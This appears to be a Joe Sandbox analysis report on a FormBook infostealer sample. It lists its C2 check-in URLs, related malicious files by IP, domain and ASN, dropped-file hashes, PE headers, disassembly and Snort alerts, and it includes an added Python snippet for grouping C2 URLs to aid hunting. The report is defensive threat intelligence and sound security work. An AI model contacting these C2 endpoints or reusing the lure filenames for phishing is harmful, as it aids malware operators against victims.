                                                                                • www.prltoday.com/uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT
                                                                                Payment slip.exeGet hashmaliciousBrowse
                                                                                • www.lebigconcours.com/3edq/?2dUX-PAP=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAeo737h+ZhVc&D6Otan=1bu800r
                                                                                Shipping Draft Doc.exeGet hashmaliciousBrowse
  • www.geraldineprofit.com/ajsp/?m2MXt=mX3FC0rWOmZLwh4qbfvKXGX9RdF3hnuYXE+OWqE17ZQMzXMEP9+qCOq0VSXzZEPsPtF9&g6bX=7nfxC0PhW
  Payment_Advice.exe, Detection: malicious
  • www.prltoday.com/uqf5/?9rw=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580fE4Vra9h2o&s6=bPYXfd3Xq0VHDp
  statement.exe, Detection: malicious
  • www.economiemalin.com/s5cm/?jZVXl=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmewkBggS6qKyN&t6AdVb=NdfHc4_xG2JHQlV
  1092991(JB#082).exe, Detection: malicious
  • www.lebigconcours.com/3edq/?JfEt9j6h=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAeo737h+ZhVc&ojn0d=RzuliD
  OUTSTANDING PAYMENT REMINDER.exe, Detection: malicious
  • www.poacolors.com/ngvm/?FPWhHFq=8TcJTBzsK+HhuKYXehH9492pDxzGvvxdxfrG/qrl9m6Ckg/etRlY8SCi3gsL+m2BF2U4&Bj=lHL8SXfh3Ju
  ZEtvKwfrmf.exe, Detection: malicious
  • www.hunab.tech/a8si/?ndiHKd=R2Mdy&Jdvd=faV7garRSu7JiSdjFrXmcIZZ3FAmdB/GT7EG2sZeIe9fZGAKSSr6iowPvTsgHFLaJTVrUqirQA==
  invoice.exe, Detection: malicious
  • www.lebigconcours.com/3edq/?URZh=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAdIr4axGHE8b&jL30vv=afhhplx
  1bb71f86_by_Libranalysis.exe, Detection: malicious
  • www.saveursdelaferme.com/njhr/?_89pb=6BYgV36frgEPm4Bks1lvfbqyImS2+mAjTc1MWw0zm1TdS4XMIGEQigd8Qb1RKTDe9sQA&FPWl=Cd8tG
  correct invoice.exe, Detection: malicious
  • www.economiemalin.com/s5cm/?Zh3XHBo=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmezI7jh+Bp9TckTab0g==&Xv0Hzp=j0Dx
Match: 172.67.129.33
  0FKzNO1g3P.exe, Detection: malicious
  • www.builtbydawn.com/dy8g/?8pWL=Wlch&rVW8M4=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX
  orders.exe, Detection: malicious
  • www.furlashop.site/ni6e/?W6=dhmVnxFiqqQHtzkp6eqPey57Y8PFMjt1OTneE2bUvMahMvc1ZtnhmpLaq/pNC70nk10eiFrAbg==&UlPt=GVoxsVvHVpd8Sl
Match: 75.2.81.221
  Shipping Documents C1216.exe, Detection: malicious
  • www.helpwithgre.com/fhg5/?idFt5Lt8=2UtB8DcbqqUNdGGafXCP7IZK2b+ICtd8++zQoCDv+Hjw8z9Bnq28qASc6PfUd7Mbl5s7loQVOw==&TZ=EjUt0xR
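The check-in URLs listed above share one shape: a host, a short path token, and a query whose key names change from sample to sample while the host/path pair repeats (www.lebigconcours.com/3edq/ and www.economiemalin.com/s5cm/ each occur twice under different keys). The following is an added example, not part of the Joe Sandbox report: it groups the listed URLs by host and path so that the overlap is visible, and matches a candidate URL on that stable part instead of on the full query string. The URL list is copied from the table above; the function names and the matching rule are this example's own choices.

```python
"""Group FormBook-style C2 URLs from the context table by host and path.

Added example for this report, not sandbox output. The URL list is copied
from the table above; function names and the matching rule are this
example's assumptions.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Copied from the IP context table above: 12 check-in URLs.
OBSERVED_URLS = [
    "www.geraldineprofit.com/ajsp/?m2MXt=mX3FC0rWOmZLwh4qbfvKXGX9RdF3hnuYXE+OWqE17ZQMzXMEP9+qCOq0VSXzZEPsPtF9&g6bX=7nfxC0PhW",
    "www.prltoday.com/uqf5/?9rw=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580fE4Vra9h2o&s6=bPYXfd3Xq0VHDp",
    "www.economiemalin.com/s5cm/?jZVXl=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmewkBggS6qKyN&t6AdVb=NdfHc4_xG2JHQlV",
    "www.lebigconcours.com/3edq/?JfEt9j6h=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAeo737h+ZhVc&ojn0d=RzuliD",
    "www.poacolors.com/ngvm/?FPWhHFq=8TcJTBzsK+HhuKYXehH9492pDxzGvvxdxfrG/qrl9m6Ckg/etRlY8SCi3gsL+m2BF2U4&Bj=lHL8SXfh3Ju",
    "www.hunab.tech/a8si/?ndiHKd=R2Mdy&Jdvd=faV7garRSu7JiSdjFrXmcIZZ3FAmdB/GT7EG2sZeIe9fZGAKSSr6iowPvTsgHFLaJTVrUqirQA==",
    "www.lebigconcours.com/3edq/?URZh=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAdIr4axGHE8b&jL30vv=afhhplx",
    "www.saveursdelaferme.com/njhr/?_89pb=6BYgV36frgEPm4Bks1lvfbqyImS2+mAjTc1MWw0zm1TdS4XMIGEQigd8Qb1RKTDe9sQA&FPWl=Cd8tG",
    "www.economiemalin.com/s5cm/?Zh3XHBo=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmezI7jh+Bp9TckTab0g==&Xv0Hzp=j0Dx",
    "www.builtbydawn.com/dy8g/?8pWL=Wlch&rVW8M4=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX",
    "www.furlashop.site/ni6e/?W6=dhmVnxFiqqQHtzkp6eqPey57Y8PFMjt1OTneE2bUvMahMvc1ZtnhmpLaq/pNC70nk10eiFrAbg==&UlPt=GVoxsVvHVpd8Sl",
    "www.helpwithgre.com/fhg5/?idFt5Lt8=2UtB8DcbqqUNdGGafXCP7IZK2b+ICtd8++zQoCDv+Hjw8z9Bnq28qASc6PfUd7Mbl5s7loQVOw==&TZ=EjUt0xR",
]


def split_c2_url(url: str) -> tuple:
    """Return (host, path, [query keys]) without URL-decoding anything.

    Values are deliberately left untouched: they are opaque blobs, and a
    '+' or '/' inside them must not be reinterpreted as a space or a path.
    """
    if "://" not in url:
        url = "http://" + url          # the table lists scheme-less URLs
    parts = urlsplit(url)
    keys = [pair.partition("=")[0] for pair in parts.query.split("&") if pair]
    return parts.hostname, parts.path, keys


def group_by_host_path(urls) -> dict:
    """Map (host, path) -> list of the query-key lists seen with that pair."""
    groups = defaultdict(list)
    for url in urls:
        host, path, keys = split_c2_url(url)
        groups[(host, path)].append(keys)
    return dict(groups)


def repeated_pairs(groups) -> list:
    """(host, path) pairs observed with more than one set of query keys."""
    return sorted(pair for pair, keysets in groups.items() if len(keysets) > 1)


def matches_known_c2(url: str, groups) -> bool:
    """True when host and path match a known pair, whatever the query keys are."""
    host, path, _ = split_c2_url(url)
    return (host, path) in groups


if __name__ == "__main__":
    known = group_by_host_path(OBSERVED_URLS)
    for (host, path), keysets in sorted(known.items()):
        print(f"{host}{path}  seen {len(keysets)}x  keys={keysets}")
    print("repeated:", repeated_pairs(known))
```

Hunting on host plus path token rather than on the full URL is the point: the query keys are different on every check-in in the table, so a rule keyed on them would miss the next sample from the same campaign.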

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: 825610.parkingcrew.net
  Shipping Documents C1216.exe, Detection: malicious
  • 75.2.81.221
  47DOC008699383837383 PDF.exe, Detection: malicious
  • 54.72.9.115
  29SCAN 0750.exe, Detection: malicious
  • 54.72.9.115
Match: www.builtbydawn.com
  0FKzNO1g3P.exe, Detection: malicious
  • 172.67.129.33

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: EGIHOSTINGUS
  kXkTaGocR5.exe, Detection: malicious
  • 142.111.47.2
  New Order_PO 1164_HD-F 4020 6K.exe, Detection: malicious
  • 107.186.80.254
  Swift advice Receipt.exe, Detection: malicious
  • 107.187.208.22
  Nuvoco_RFQ_21-06-2021.exe, Detection: malicious
  • 104.164.227.199
  Statement for MCF and SSL890935672002937383920028202.exe, Detection: malicious
  • 45.39.168.175
  Purchase Order No. 7406595 .xlsx, Detection: malicious
  • 142.111.47.2
  INVOICE E-4137 REV.1 AND E-4136 REV.1.exe, Detection: malicious
  • 172.252.104.51
  Payment copy_MT103_9847.exe, Detection: malicious
  • 104.252.33.45
  #10923.exe, Detection: malicious
  • 45.39.170.172
  Enquiry (OUR REF #162620321) (OUR REF # 166060421) Taylor Marine Project.exe, Detection: malicious
  • 23.230.206.228
  1itFWK1W1z.exe, Detection: malicious
  • 104.252.121.237
  JUN14 OUTSTANDING CONTRACT ORDER-01.xlsx, Detection: malicious
  • 104.252.121.237
  succ.exe, Detection: malicious
  • 142.111.45.198
  UOMp9cDcqZ.exe, Detection: malicious
  • 142.111.47.2
  DNPr7t0GMY.exe, Detection: malicious
  • 142.111.47.2
  Letter 09JUN 2021.xlsx, Detection: malicious
  • 142.111.47.2
  lLJGwAgWDh.exe, Detection: malicious
  • 104.252.75.149
  Invoice number FV0062022020.exe, Detection: malicious
  • 104.164.109.43
  tzeEeC2CBA.exe, Detection: malicious
  • 142.111.47.2
  RFQ.exe, Detection: malicious
  • 136.0.84.126
Match: OVHFR
  RFQ-BCM 03122020.exe, Detection: malicious
  • 213.186.33.5
  20210622-kll98374.exe, Detection: malicious
  • 213.186.33.5
  New_PO#98202139.xll, Detection: malicious
  • 213.186.33.5
  Aramco Urgent Inquiry.exe, Detection: malicious
  • 158.69.138.23
  o7w2HSi17V.exe, Detection: malicious
  • 151.80.212.114
  KTOpmUzBlp.xls, Detection: malicious
  • 149.202.90.163
  KTOpmUzBlp.xls, Detection: malicious
  • 149.202.90.163
  KTOpmUzBlp.xls, Detection: malicious
  • 149.202.90.163
  New Order Quotation.exe, Detection: malicious
  • 91.121.250.242
  kdhfue77324.exe, Detection: malicious
  • 213.186.33.5
  Purchase_Order.exe, Detection: malicious
  • 51.195.43.214
  v6OezjZIJX, Detection: malicious
  • 176.31.225.204
  INVOICE-CVE-0814.doc, Detection: malicious
  • 188.165.215.31
  New Order - unitednature- 34526745727_PDF.exe, Detection: malicious
  • 158.69.185.137
  butkoin-android.apk, Detection: malicious
  • 51.161.32.104
  butkoin-android.apk, Detection: malicious
  • 51.161.32.104
  ProstoLauncher.exe, Detection: malicious
  • 51.91.79.48
  qH2tfmLbBO433it.exe, Detection: malicious
  • 54.36.120.230
  8qVvWJZa2l.exe, Detection: malicious
  • 51.195.61.169
  n5X8VTnH3C.exe, Detection: malicious
  • 51.195.61.169
Match: CLOUDFLARENETUS
  Order.exe, Detection: malicious
  • 23.227.38.74
  0FKzNO1g3P.exe, Detection: malicious
  • 104.21.86.209
  ZLT4uMbNxX.exe, Detection: malicious
  • 172.67.158.27
  Payment Ref 24,845.docx, Detection: malicious
  • 172.67.150.133
  #U00f0#U0178#U2022#U00bb Missed Call Playback Recording.wav%20%20-%20%2B1%208459838811.htm, Detection: malicious
  • 104.16.18.94
  Payment Ref 24,845.docx, Detection: malicious
  • 104.21.30.38
  Halkbank_Ekstre_20210622_142426_2309801.doc.exe, Detection: malicious
  • 172.67.188.154
  DLJxQ5rIop.exe, Detection: malicious
  • 104.21.14.60
  Ejima.exe, Detection: malicious
  • 23.227.38.74
  kXkTaGocR5.exe, Detection: malicious
  • 104.16.12.194
  y7jLZLDw1K.exe, Detection: malicious
  • 172.67.154.116
  heoN5wnP2d.exe, Detection: malicious
  • 23.227.38.74
  y7jLZLDw1K.exe, Detection: malicious
  • 104.21.5.100
  DHL DOCUMENTS.exe, Detection: malicious
  • 23.227.38.74
  PwBsqWQ7jJ.exe, Detection: malicious
  • 104.23.99.190
  MLO.exe, Detection: malicious
  • 172.67.158.27
  RFQ-BCM 03122020.exe, Detection: malicious
  • 104.21.64.212
  New_PO#98202139.xll, Detection: malicious
  • 104.21.63.141
  Invoice.exe, Detection: malicious
  • 104.21.19.200
  xuYHNpNA7N.exe, Detection: malicious
  • 104.21.14.60

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll
  New Order.exe, Detection: malicious
  hesaphareketi-0.exe, Detection: malicious
  0FKzNO1g3P.exe, Detection: malicious
  mlzHNUHkUl.exe, Detection: malicious
  Ejima.exe, Detection: malicious
  UrgentNewOrder_pdf.exe, Detection: malicious
  Swift 001.exe, Detection: malicious
  DHL DOCUMENTS.exe, Detection: malicious
  DHL Shipment Documents.exe, Detection: malicious
  20210622-kll98374.exe, Detection: malicious
  SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious
  Orden de compra.exe, Detection: malicious
  Pending delivery - Final Attempt.exe, Detection: malicious
  2bni49vTpt.exe, Detection: malicious
  rJIeeo2B7Q.exe, Detection: malicious
  e-hesap bildirimi.exe, Detection: malicious
  Draft Booking Confirmation 062120297466471346.exe, Detection: malicious
  HalkbankEkstre0609202138711233847204.exe, Detection: malicious
  232.exe, Detection: malicious
  Yeni Siparis.exe, Detection: malicious

Created / dropped Files

C:\Users\user\AppData\Local\Temp\39fgrq8knozigd2
Process: C:\Users\user\Desktop\PQMW0W5h3X.exe
File Type: data
Category: dropped
Size (bytes): 164863
Entropy (8bit): 7.987160505943616
Encrypted: false
SSDEEP: 3072:b8jI9IpDIpzoIP+Fse43/wFMFGtz1LWNqehEAll3N/xB87W79q+ErdSLtiT77M+:IjGI9kzmFZ24V1Sbeo9P87otE4In7M+
MD5: 6C05E9CA19C49E1B760DBF27E1B1D1AC
SHA1: 555A897815D912EA8E2F745B34B596A5487DA6C1
SHA-256: 8D1046B1444E99B9BDEAEA15C07F29E894FF13DD4B3584844DACD8CF8E2BDA9E
SHA-512: 7869728E06C25F4D84473E2E4A2BC4DEBC7C3C773D26AB0D987243994C51AC07C2829F6414160DF0A194E93820C3AC52CFCFE6248AC81751921EC773710471B6
Malicious: false
Reputation: low
                                                                                                                        Preview: h......fe..Q.D.V...8.lt`.%._..Q....mVG............6.o....B........^..E....W...=Bl....S1.u.2.a.P..Nf&.s.Q..8..|[...B.#...5.. f;...).......W..!t ^9.VN.TA..G-...].....N....0x....oP.W.7.R.c.llf.|tv.I.5.1<&..4|7P.Dx.d.r$3....p|.w..R`2DBz.....N.s.8.......fe.T.q....Nr..........Q....m7G.....Y......6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..9R2.......@......l.f.|tv.4...$f<.(...7P.Dx.d..J....@..w..R`FDBz.......s.8......fe1..q....Nr..../..[..'.Q....mVG............6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..0x...x.P..D....n.llf.|tv.4...$f<...|7P.Dx.d..J....@..w..R`FDBz.......s.8......fe1..q....Nr..../..[..'.Q....mVG............6.o....B....F..q^l.K.&.f.S...HR...r....M.d..X.nA.....PKY...3..U.....#...5...e$..d..W.7PD..f...........%.=...E....v0E..0x...x.P..D....n.llf.|tv.4...$f<...|7P.Dx.d..J....
C:\Users\user\AppData\Local\Temp\axjnwhbrvqsxuek
Process: C:\Users\user\Desktop\PQMW0W5h3X.exe
File Type: DOS executable (COM)
Category: dropped
Size (bytes): 58134
Entropy (8bit): 5.253844260673871
Encrypted: false
SSDEEP: 1536:IMtQIDSwNLs8vRjAU+YqXFCeI3SoKZshe9uB:IMtQIDSwNL7ZjwV4eI3LKZ2B
MD5: D5C9184EC17F0CE4778AB93D418EFB6B
SHA1: FA5B4C0A266AE61855B671E50BBF23E8EF5D246E
SHA-256: A8863C2A1805C6E00A88A319BEEAE073336708F861D07986D8DF38B593EF5B0E
SHA-512: F9042310DA98088500A9730CD2BFA76FDF4835AF33B8BE9C0BA3A11E67F6DC56661E0AB92425658D1F91FDA7BAB964D134595748C7C3E1EB1EE174963FC1158E
Malicious: false
Reputation: low
                                                                                                                        Preview: .....U..x........S..........e...............E.;.E.-.E...E.r.E.s.e..PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5......X[PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5...
C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll
Process: C:\Users\user\Desktop\PQMW0W5h3X.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 10752
Entropy (8bit): 5.7425597599083344
Encrypted: false
SSDEEP: 192:uv+cJZE61KRWJQO6tFiUdK7ckK4k7l1XRBm0w+NiHi1GSJ:uf6rtFRduQ1W+fG8
MD5: 56A321BD011112EC5D8A32B2F6FD3231
SHA1: DF20E3A35A1636DE64DF5290AE5E4E7572447F78
SHA-256: BB6DF93369B498EAA638B0BCDC4BB89F45E9B02CA12D28BCEDF4629EA7F5E0F1
SHA-512: 5354890CBC53CE51081A78C64BA9C4C8C4DC9E01141798C1E916E19C5776DAC7C82989FAD0F08C73E81AABA332DAD81205F90D0663119AF45550B97B338B9CC3
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: New Order.exe, Detection: malicious
• Filename: hesaphareketi-0.exe, Detection: malicious
• Filename: 0FKzNO1g3P.exe, Detection: malicious
• Filename: mlzHNUHkUl.exe, Detection: malicious
• Filename: Ejima.exe, Detection: malicious
• Filename: UrgentNewOrder_pdf.exe, Detection: malicious
• Filename: Swift 001.exe, Detection: malicious
• Filename: DHL DOCUMENTS.exe, Detection: malicious
• Filename: DHL Shipment Documents.exe, Detection: malicious
• Filename: 20210622-kll98374.exe, Detection: malicious
• Filename: SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious
• Filename: Orden de compra.exe, Detection: malicious
• Filename: Pending delivery - Final Attempt.exe, Detection: malicious
• Filename: 2bni49vTpt.exe, Detection: malicious
• Filename: rJIeeo2B7Q.exe, Detection: malicious
• Filename: e-hesap bildirimi.exe, Detection: malicious
• Filename: Draft Booking Confirmation 062120297466471346.exe, Detection: malicious
• Filename: HalkbankEkstre0609202138711233847204.exe, Detection: malicious
• Filename: 232.exe, Detection: malicious
• Filename: Yeni Siparis.exe, Detection: malicious
Reputation: moderate, very likely benign file

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.8818598681550505
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PQMW0W5h3X.exe
File size: 205167
MD5: 6b26db585f40e14b00b5adda57e595dd
SHA1: ffbb4390c5cdb9d0aa78061399f5a9993a955dd3
SHA256: 8b39bf75ce8ca2ecadafeb01a2ff33fc07419198e5b222bf20385ecbf2da0ff4
SHA512: c26411bdcd24c4c8a403f0f976b1a7bcb9cad433da9a48e7b4cb4297db3a8f11ec929444a63fc3529c634bdb549704addfa7ef04f6b6130abbf03348ce92d8ba
SSDEEP: 3072:ABynOpL12rioc6MspGSA6DPJdXBH79/el5iVnLBMpBVeyb4+NVLhSkodlMxcGUHf:ABlL/bssSTPvXBwIGpBbUe/odlVDVBX
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x4030fb
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F7734B820B3h
push ebx
call 00007F7734B84E94h
cmp eax, ebx
je 00007F7734B820A9h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007F7734B84E10h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F7734B8208Dh
push 0000000Dh
call 00007F7734B84E68h
push 0000000Bh
call 00007F7734B84E61h
mov dword ptr [00423F44h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [00423FF8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041F4F0h
call dword ptr [0040715Ch]
push 0040915Ch
push 00423740h
call 00007F7734B84A94h
call dword ptr [0040710Ch]
mov ebp, 0042A000h
push eax
push ebp
call 00007F7734B84A82h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7418 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0xc80 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5aeb | 0x5c00 | False | 0.665123980978 | data | 6.42230569414 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1196 | 0x1200 | False | 0.458984375 | data | 5.20291736659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b038 | 0x600 | False | 0.432291666667 | data | 4.0475118296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2d000 | 0xc80 | 0xe00 | False | 0.412109375 | data | 4.00712910454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d1d8 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2d4c0 | 0x100 | data | English | United States
RT_DIALOG | 0x2d5c0 | 0x11c | data | English | United States
RT_DIALOG | 0x2d6e0 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2d740 | 0x14 | data | English | United States
RT_VERSION | 0x2d758 | 0x254 | data | |
RT_MANIFEST | 0x2d9b0 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Version Infos

Description | Data
LegalCopyright | lieutenant
FileVersion | 9.7.6.5
CompanyName | stone
LegalTrademarks | apologizes
Comments | firearms
ProductName | grandeur
FileDescription | undoubtedly
Translation | 0x0000 0x04e4

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        06/22/21-18:25:02.550642TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:07.827526TCP1201ATTACK-RESPONSES 403 Forbidden804975734.102.136.180192.168.2.6
                                                                                                                        06/22/21-18:25:18.311331TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.311331TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
